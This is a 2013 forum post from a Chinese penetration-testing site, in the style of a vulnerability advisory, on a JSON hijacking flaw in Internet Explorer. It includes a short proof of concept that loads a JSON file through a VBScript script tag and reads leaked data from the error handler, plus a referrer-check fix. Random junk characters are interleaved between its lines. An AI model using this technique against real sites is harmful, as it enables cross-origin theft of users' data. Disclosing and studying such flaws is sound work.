中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
& h8 U; M; Y- F$ l2 d( q
+ s+ s$ j+ h! D& } W! u- A
由于某些资源容器对数据处理不当导致json劫持漏洞.
+ r* G: d# U; B' q" l# \
详细说明:
$ Z0 i% r5 |9 @2 e$ i+ O
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
8 k! f o) T/ b( _
<script language=vbscript></script>
; c. t: f" ?7 {3 @7 t0 s
. [, t/ i/ P( s# d3 i4 s$ |
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
& p- v2 ~4 R- `" f: u
漏洞证明:
" ]3 M, b% @3 a- {) v! U, D
<script>
0 b% Y; i# Z5 s" ?7 A2 ?; u
window.onerror=function(_){
6 l4 v) |2 k w& o5 n" t) d
alert(_)
# o5 T# f. }: T7 y& Z
}
3 [4 ~+ l+ F$ b& t8 ~ ]8 R
</script>
1 [- c2 X" p) H
<script language=vbscript src=1.json></script>
1 u: j: R2 |: M9 p; m8 u
5 j. M& D9 q- h% }$ D5 s ~
6 f4 W4 K, m2 b
1.json:
. b! p% M, R& J) Z: q
[{"name":"sogili","age":19}]
/ ]6 C0 e6 g5 v2 u9 y
修复方案:
" d3 @ \% @5 O' D7 L8 u1 _
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2